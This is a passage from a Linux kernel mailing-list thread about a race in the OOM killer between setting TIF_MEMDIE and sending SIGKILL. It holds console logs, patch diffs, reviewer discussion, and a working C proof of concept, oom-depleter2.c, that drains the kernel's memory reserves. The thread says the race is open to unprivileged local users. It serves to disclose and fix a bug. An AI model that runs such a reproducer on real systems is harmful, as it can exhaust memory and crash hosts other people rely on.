[ 157.310210] [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0
[ 157.311713] [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0
[ 157.313155] [<ffffffff8117b489>] vfs_read+0x79/0x120
[ 157.314575] [<ffffffff8117c1a0>] SyS_read+0x50/0xc0
[ 157.315980] [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71
[ 157.317649] Showing busy workqueues and worker pools:
[ 157.319070] workqueue events: flags=0x0
[ 157.320261] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=4/256
[ 157.321980] pending: vmstat_shepherd, vmstat_update, e1000_watchdog [e1000], vmpressure_work_fn
[ 157.324279] workqueue events_freezable: flags=0x4
[ 157.325652] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[ 157.327373] pending: vmballoon_work [vmw_balloon]
[ 157.328859] workqueue events_power_efficient: flags=0x80
[ 157.330343] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[ 157.332067] pending: neigh_periodic_work
[ 157.333431] workqueue events_freezable_power_: flags=0x84
[ 157.334941] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[ 157.336684] in-flight: 228:disk_events_workfn
[ 157.338168] workqueue xfs-log/sda1: flags=0x14
[ 157.339473] pwq 7: cpus=3 node=0 flags=0x0 nice=-20 active=2/256
[ 157.341255] in-flight: 1369:xfs_log_worker
[ 157.342674] pending: xfs_buf_ioend_work
[ 157.344066] pool 2: cpus=1 node=0 flags=0x0 nice=0 workers=3 idle: 43 14
[ 157.346039] pool 7: cpus=3 node=0 flags=0x0 nice=-20 workers=2 manager: 27
[ 185.044658] sysrq: SysRq : Show Memory
[ 185.045975] Mem-Info:
[ 185.046968] active_anon:423788 inactive_anon:2085 isolated_anon:0
[ 185.046968] active_file:0 inactive_file:1 isolated_file:0
[ 185.046968] unevictable:0 dirty:0 writeback:0 unstable:0
[ 185.046968] slab_reclaimable:1689 slab_unreclaimable:5401
[ 185.046968] mapped:391 shmem:2146 pagetables:2123 bounce:0
[ 185.046968] free:4 free_pcp:0 free_cma:0
[ 185.056165] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes
[ 185.066444] lowmem_reserve[]: 0 1731 1731 1731
[ 185.068083] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 185.079186] lowmem_reserve[]: 0 0 0 0
[ 185.080783] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[ 185.083790] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB
[ 185.087232] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 185.089572] 2147 total pagecache pages
[ 185.091096] 0 pages in swap cache
[ 185.092469] Swap cache stats: add 0, delete 0, find 0/0
[ 185.094288] Free swap = 0kB
[ 185.095671] Total swap = 0kB
[ 185.097075] 524157 pages RAM
[ 185.098466] 0 pages HighMem/MovableOnly
[ 185.100005] 76583 pages reserved
[ 185.101435] 0 pages hwpoisoned
[ 205.509157] sysrq: SysRq : Resetting
---------- console log end ----------
Complete log is at http://I-love.SAKURA.ne.jp/tmp/serial-20150731.txt.xz .
Thus, here is a SEPARATE PATCH WITH A JUSTIFICATION.
After applying this patch, I can no longer reproduce this problem.
----------------------------------------
From 2945dffb8d602947800348d44d317bae152f890c Mon Sep 17 00:00:00 2001
From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Date: Fri, 31 Jul 2015 19:06:28 +0900
Subject: [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and
sending SIGKILL.
It is observed that a multi-threaded program can deplete memory reserves
during the time lag between the moment the OOM killer sets TIF_MEMDIE and
the moment it sends SIGKILL. This is because the thread group leader which
got TIF_MEMDIE receives SIGKILL too late when many child threads share the
same memory, since the for_each_process() loop does a printk() for each of
them, which can take many seconds.
Before starting oom-depleter process:
Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
As of invoking the OOM killer:
Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
Between the moment the thread group leader got TIF_MEMDIE and the moment it
received SIGKILL:
Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
The oom-depleter's thread group leader started its user-space memset()
after the OOM killer set TIF_MEMDIE, and it was free to abuse
ALLOC_NO_WATERMARKS via TIF_MEMDIE for that memset() until SIGKILL
was delivered. If SIGKILL is delivered before TIF_MEMDIE is set, the
oom-depleter can terminate without touching the memory reserves.
Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
---
mm/oom_kill.c | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 5249e7e..c0a5a69 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	/* Get a reference to safely compare mm after task_unlock(victim) */
 	mm = victim->mm;
 	atomic_inc(&mm->mm_users);
-	mark_oom_victim(victim);
 	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
 		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
 		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
 		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
 	task_unlock(victim);
+	/* Send SIGKILL before setting TIF_MEMDIE. */
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
+	task_lock(victim);
+	if (victim->mm)
+		mark_oom_victim(victim);
+	task_unlock(victim);
 
 	/*
 	 * Kill all user processes sharing victim->mm in other thread groups, if
@@ -586,7 +591,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mmput(mm);
 	put_task_struct(victim);
 }
--
1.8.3.1
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
From: Michal Hocko @ 2015-08-24 9:47 UTC
To: Tetsuo Handa; +Cc: rientjes, hannes, linux-mm
On Sun 23-08-15 16:19:38, Tetsuo Handa wrote:
[...]
> I tried to reproduce what I worried about at
> http://www.spinics.net/lists/linux-mm/msg82342.html . I confirmed that a
> local unprivileged user can consume all of the memory reserves using this time lag.
You were right!
> From 2945dffb8d602947800348d44d317bae152f890c Mon Sep 17 00:00:00 2001
> From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
> Date: Fri, 31 Jul 2015 19:06:28 +0900
> Subject: [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and
> sending SIGKILL.
>
> It is observed that a multi-threaded program can deplete memory reserves
> during the time lag between the moment the OOM killer sets TIF_MEMDIE and
> the moment it sends SIGKILL. This is because the thread group leader which
> got TIF_MEMDIE receives SIGKILL too late when many child threads share the
> same memory, since the for_each_process() loop does a printk() for each of
> them, which can take many seconds.
>
> Before starting oom-depleter process:
>
> Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
> Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
>
> As of invoking the OOM killer:
>
> Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
> Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
>
> Between the moment the thread group leader got TIF_MEMDIE and the moment it
> received SIGKILL:
>
> Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
> Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
>
> The oom-depleter's thread group leader started its user-space memset()
> after the OOM killer set TIF_MEMDIE, and it was free to abuse
> ALLOC_NO_WATERMARKS via TIF_MEMDIE for that memset() until SIGKILL
> was delivered. If SIGKILL is delivered before TIF_MEMDIE is set, the
> oom-depleter can terminate without touching the memory reserves.
>
> Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
> ---
> mm/oom_kill.c | 8 ++++++--
> 1 file changed, 6 insertions(+), 2 deletions(-)
>
> diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> index 5249e7e..c0a5a69 100644
> --- a/mm/oom_kill.c
> +++ b/mm/oom_kill.c
> @@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  	/* Get a reference to safely compare mm after task_unlock(victim) */
>  	mm = victim->mm;
>  	atomic_inc(&mm->mm_users);
> -	mark_oom_victim(victim);
>  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
>  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
>  		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
>  		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
>  	task_unlock(victim);
> +	/* Send SIGKILL before setting TIF_MEMDIE. */
> +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> +	task_lock(victim);
> +	if (victim->mm)
> +		mark_oom_victim(victim);
> +	task_unlock(victim);
Why can't you simply move do_send_sig_info without touching
mark_oom_victim? Are you still able to trigger the issue if you just
kill before crawling through all the tasks sharing the mm?
The code would be simpler then and the race window much smaller. If we
really needed to prevent preemption then preempt_{enable,disable}
around the whole task_lock region + do_send_sig_info would still be
easier to follow than re-taking task_lock.
>
>  	/*
>  	 * Kill all user processes sharing victim->mm in other thread groups, if
> @@ -586,7 +591,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  	}
>  	rcu_read_unlock();
> 
> -	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
>  	mmput(mm);
>  	put_task_struct(victim);
>  }
> --
> 1.8.3.1
--
Michal Hocko
SUSE Labs
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
From: Tetsuo Handa @ 2015-08-25 12:06 UTC
To: mhocko; +Cc: rientjes, hannes, linux-mm
Michal Hocko wrote:
> > diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> > index 5249e7e..c0a5a69 100644
> > --- a/mm/oom_kill.c
> > +++ b/mm/oom_kill.c
> > @@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
> >  	/* Get a reference to safely compare mm after task_unlock(victim) */
> >  	mm = victim->mm;
> >  	atomic_inc(&mm->mm_users);
> > -	mark_oom_victim(victim);
> >  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
> >  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
> >  		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
> >  		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
> >  	task_unlock(victim);
> > +	/* Send SIGKILL before setting TIF_MEMDIE. */
> > +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> > +	task_lock(victim);
> > +	if (victim->mm)
> > +		mark_oom_victim(victim);
> > +	task_unlock(victim);
>
> Why can't you simply move do_send_sig_info without touching
> mark_oom_victim? Are you still able to trigger the issue if you just
> kill before crawling through all the tasks sharing the mm?
If you meant
diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 1ecc0bc..ea578fb 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -560,6 +560,7 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
 		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
 	task_unlock(victim);
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 
 	/*
 	 * Kill all user processes sharing victim->mm in other thread groups, if
@@ -585,7 +586,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	put_task_struct(victim);
 }
 #undef K
then yes, I can still trigger the issue under a very limited condition (i.e.
running as the root user, polling kernel messages with realtime priority, after
killing all processes using SysRq-i).
---------- oom-depleter2.c start ----------
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/klog.h>

static int zero_fd = -1;
static char *buf = NULL;
static unsigned long size = 0;

static int trigger(void *unused)
{
	{
		struct sched_param sp = { };
		sched_setscheduler(0, SCHED_IDLE, &sp);
	}
	read(zero_fd, buf, size); /* Will cause OOM due to overcommit */
	return 0;
}

int main(int argc, char *argv[])
{
	unsigned long i;
	zero_fd = open("/dev/zero", O_RDONLY);
	for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
		char *cp = realloc(buf, size);
		if (!cp) {
			size >>= 1;
			break;
		}
		buf = cp;
	}
	/* Let a child thread trigger the OOM killer. */
	clone(trigger, malloc(4096) + 4096, CLONE_SIGHAND | CLONE_VM, NULL);
	{
		struct sched_param sp = { 99 };
		sched_setscheduler(0, SCHED_FIFO, &sp);
	}
	/* Wait until the OOM killer messages appear. */
	while (1) {
		i = klogctl(2, buf, size - 1);
		if (i > 0) {
			buf[i] = '\0';
			if (strstr(buf, "Killed process "))
				break;
		}
	}
	/* Deplete all memory reserves. */
	for (i = size; i; i -= 4096)
		buf[i - 1] = 1;
	return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter2.c end ----------
# taskset -c 0 ./oom-depleter2
(Intentionally running two threads with different priorities on the same CPU
in order to increase the possibility of preemption kicking in.)
---------- console log start ----------
[ 47.069197] oom-depleter2 invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[ 47.070651] oom-depleter2 cpuset=/ mems_allowed=0
[ 47.072982] CPU: 0 PID: 3851 Comm: oom-depleter2 Tainted: G W 4.2.0-rc7-next-20150824+ #85
[ 47.074683] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[ 47.076583] 0000000000000000 00000000115c5c6c ffff88007ca2f8c8 ffffffff81313283
[ 47.078014] ffff88007890f2c0 ffff88007ca2f970 ffffffff8117ff7d 0000000000000000
[ 47.079438] 0000000000000202 0000000000000018 0000000000000001 0000000000000202
[ 47.080856] Call Trace:
[ 47.081335] [<ffffffff81313283>] dump_stack+0x4b/0x78
[ 47.082233] [<ffffffff8117ff7d>] dump_header+0x82/0x232
[ 47.083234] [<ffffffff81627645>] ? _raw_spin_unlock_irqrestore+0x25/0x30
[ 47.084447] [<ffffffff810fe041>] ? delayacct_end+0x51/0x60
[ 47.085483] [<ffffffff81114fd2>] oom_kill_process+0x372/0x3c0
[ 47.086551] [<ffffffff81071cd0>] ? has_ns_capability_noaudit+0x30/0x40
[ 47.087715] [<ffffffff81071cf2>] ? has_capability_noaudit+0x12/0x20
[ 47.088874] [<ffffffff8111528d>] out_of_memory+0x21d/0x4a0
[ 47.089915] [<ffffffff8111a774>] __alloc_pages_nodemask+0x904/0x930
[ 47.091010] [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0
[ 47.092042] [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950
[ 47.093076] [<ffffffff816287cd>] ? retint_kernel+0x1b/0x1d
[ 47.094108] [<ffffffff81628837>] ? native_iret+0x7/0x7
[ 47.095108] [<ffffffff810565bb>] __do_page_fault+0x18b/0x440
[ 47.096109] [<ffffffff810568a0>] do_page_fault+0x30/0x80
[ 47.097052] [<ffffffff816297e8>] page_fault+0x28/0x30
[ 47.098544] [<ffffffff81320ae0>] ? __clear_user+0x20/0x50
[ 47.099651] [<ffffffff813254b8>] iov_iter_zero+0x68/0x250
[ 47.100642] [<ffffffff810920f6>] ? sched_clock_cpu+0x86/0xc0
[ 47.101701] [<ffffffff813f9018>] read_iter_zero+0x38/0xa0
[ 47.102754] [<ffffffff81183ec4>] __vfs_read+0xc4/0xf0
[ 47.103684] [<ffffffff81184639>] vfs_read+0x79/0x120
[ 47.104630] [<ffffffff81185350>] SyS_read+0x50/0xc0
[ 47.105503] [<ffffffff8108bd9c>] ? do_sched_setscheduler+0x7c/0xb0
[ 47.106637] [<ffffffff81627cae>] entry_SYSCALL_64_fastpath+0x12/0x71
[ 47.109307] Mem-Info:
[ 47.109801] active_anon:416244 inactive_anon:3737 isolated_anon:0
[ 47.109801] active_file:0 inactive_file:474 isolated_file:0
[ 47.109801] unevictable:0 dirty:0 writeback:0 unstable:0
[ 47.109801] slab_reclaimable:1114 slab_unreclaimable:3896
[ 47.109801] mapped:96 shmem:4188 pagetables:1014 bounce:0
[ 47.109801] free:12368 free_pcp:183 free_cma:0
[ 47.118364] Node 0 DMA free:7316kB min:400kB low:500kB high:600kB active_anon:7056kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes
[ 47.129538] lowmem_reserve[]: 0 1731 1731 1731
[ 47.131230] Node 0 DMA32 free:44016kB min:44652kB low:55812kB high:66976kB active_anon:1657920kB inactive_anon:14716kB active_file:0kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:796kB local_pcp:56kB free_cma:0kB writeback_tmp:0kB pages_scanned:124 all_unreclaimable? no
[ 47.143246] lowmem_reserve[]: 0 0 0 0
[ 47.145175] Node 0 DMA: 17*4kB (UE) 9*8kB (UE) 9*16kB (UEM) 1*32kB (M) 1*64kB (M) 2*128kB (UE) 2*256kB (EM) 2*512kB (EM) 1*1024kB (E) 2*2048kB (EM) 0*4096kB = 7292kB
[ 47.152896] Node 0 DMA32: 1009*4kB (UEM) 617*8kB (UEM) 268*16kB (UEM) 118*32kB (UEM) 43*64kB (UEM) 13*128kB (UEM) 11*256kB (UEM) 10*512kB (UM) 12*1024kB (UM) 1*2048kB (U) 0*4096kB = 43724kB
[ 47.161214] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 47.163987] 4649 total pagecache pages
[ 47.166121] 0 pages in swap cache
[ 47.168500] Swap cache stats: add 0, delete 0, find 0/0
[ 47.170238] Free swap = 0kB
[ 47.171764] Total swap = 0kB
[ 47.173270] 524157 pages RAM
[ 47.174520] 0 pages HighMem/MovableOnly
[ 47.175930] 76617 pages reserved
[ 47.178043] 0 pages hwpoisoned
[ 47.179584] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name
[ 47.182065] [ 3820] 0 3820 10756 168 24 3 0 0 systemd-journal
[ 47.184504] [ 3823] 0 3823 10262 101 23 3 0 -1000 systemd-udevd
[ 47.186847] [ 3824] 0 3824 27503 33 12 3 0 0 agetty
[ 47.189291] [ 3825] 0 3825 8673 84 23 3 0 0 systemd-logind
[ 47.191691] [ 3826] 0 3826 21787 154 48 3 0 0 login
[ 47.193959] [ 3828] 81 3828 6609 82 18 3 0 -900 dbus-daemon
[ 47.196297] [ 3831] 0 3831 28878 93 15 3 0 0 bash
[ 47.198573] [ 3850] 0 3850 541715 414661 820 6 0 0 oom-depleter2
[ 47.200915] [ 3851] 0 3851 541715 414661 820 6 0 0 oom-depleter2
[ 47.203410] Out of memory: Kill process 3850 (oom-depleter2) score 900 or sacrifice child
[ 47.205695] Killed process 3850 (oom-depleter2) total-vm:2166860kB, anon-rss:1658644kB, file-rss:0kB
[ 47.257871] oom-depleter2: page allocation failure: order:0, mode:0x280da
[ 47.260006] CPU: 0 PID: 3850 Comm: oom-depleter2 Tainted: G W 4.2.0-rc7-next-20150824+ #85
[ 47.262473] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[ 47.265184] 0000000000000000 000000000f39672f ffff880036febbe0 ffffffff81313283
[ 47.267511] 00000000000280da ffff880036febc70 ffffffff81116e04 0000000000000000
[ 47.269815] ffffffff00000000 ffff88007fc19730 ffff880000000004 ffffffff810a30cf
[ 47.272019] Call Trace:
[ 47.273283] [<ffffffff81313283>] dump_stack+0x4b/0x78
[ 47.275081] [<ffffffff81116e04>] warn_alloc_failed+0xf4/0x150
[ 47.276962] [<ffffffff810a30cf>] ? __wake_up+0x3f/0x50
[ 47.278700] [<ffffffff8111a0bc>] __alloc_pages_nodemask+0x24c/0x930
[ 47.280664] [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0
[ 47.282422] [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950
[ 47.284240] [<ffffffff810565bb>] __do_page_fault+0x18b/0x440
[ 47.286036] [<ffffffff810568a0>] do_page_fault+0x30/0x80
[ 47.287693] [<ffffffff816297e8>] page_fault+0x28/0x30
[ 47.289358] Mem-Info:
[ 47.290494] active_anon:429031 inactive_anon:3737 isolated_anon:0
[ 47.290494] active_file:0 inactive_file:0 isolated_file:0
[ 47.290494] unevictable:0 dirty:0 writeback:0 unstable:0
[ 47.290494] slab_reclaimable:1114 slab_unreclaimable:3896
[ 47.290494] mapped:96 shmem:4188 pagetables:1014 bounce:0
[ 47.290494] free:0 free_pcp:180 free_cma:0
[ 47.299662] Node 0 DMA free:8kB min:400kB low:500kB high:600kB active_anon:14308kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes
[ 47.309430] lowmem_reserve[]: 0 1731 1731 1731
[ 47.311000] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1701816kB inactive_anon:14716kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:720kB local_pcp:24kB free_cma:0kB writeback_tmp:0kB pages_scanned:5584 all_unreclaimable? yes
[ 47.321601] lowmem_reserve[]: 0 0 0 0
[ 47.323166] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[ 47.326070] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[ 47.329018] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 47.331385] 4189 total pagecache pages
[ 47.332896] 0 pages in swap cache
[ 47.334262] Swap cache stats: add 0, delete 0, find 0/0
[ 47.335990] Free swap = 0kB
[ 47.337390] Total swap = 0kB
[ 47.338656] 524157 pages RAM
[ 47.339964] 0 pages HighMem/MovableOnly
[ 47.341464] 76617 pages reserved
[ 47.342808] 0 pages hwpoisoned
(...snipped...)
[ 93.082032] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[ 93.082034] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
---------- console log end ----------
Complete log is at http://I-love.SAKURA.ne.jp/tmp/serial-20150825.txt.xz .
>
> The code would be easier then and the race window much smaller. If we
> really needed to prevent from preemption then preempt_{enable,disable}
> aournd the whole task_lock region + do_send_sig_info would be still
> easier to follow than re-taking task_lock.
What's wrong with re-taking task_lock? It seems to me that re-taking
task_lock is more straightforward and easier to follow.
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
From: Michal Hocko @ 2015-08-25 14:17 UTC
To: Tetsuo Handa; +Cc: rientjes, hannes, linux-mm
On Tue 25-08-15 21:06:36, Tetsuo Handa wrote:
> Michal Hocko wrote:
> > > diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> > > index 5249e7e..c0a5a69 100644
> > > --- a/mm/oom_kill.c
> > > +++ b/mm/oom_kill.c
> > > @@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
> > >  	/* Get a reference to safely compare mm after task_unlock(victim) */
> > >  	mm = victim->mm;
> > >  	atomic_inc(&mm->mm_users);
> > > -	mark_oom_victim(victim);
> > >  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
> > >  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
> > >  		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
> > >  		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
> > >  	task_unlock(victim);
> > > +	/* Send SIGKILL before setting TIF_MEMDIE. */
> > > +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> > > +	task_lock(victim);
> > > +	if (victim->mm)
> > > +		mark_oom_victim(victim);
> > > +	task_unlock(victim);
> >
> > Why can't you simply move do_send_sig_info without touching
> > mark_oom_victim? Are you still able to trigger the issue if you just
> > kill before crawling through all the tasks sharing the mm?
>
> If you meant
>
> diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> index 1ecc0bc..ea578fb 100644
> --- a/mm/oom_kill.c
> +++ b/mm/oom_kill.c
> @@ -560,6 +560,7 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
>  		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
>  	task_unlock(victim);
> +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> 
>  	/*
>  	 * Kill all user processes sharing victim->mm in other thread groups, if
> @@ -585,7 +586,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  	}
>  	rcu_read_unlock();
> 
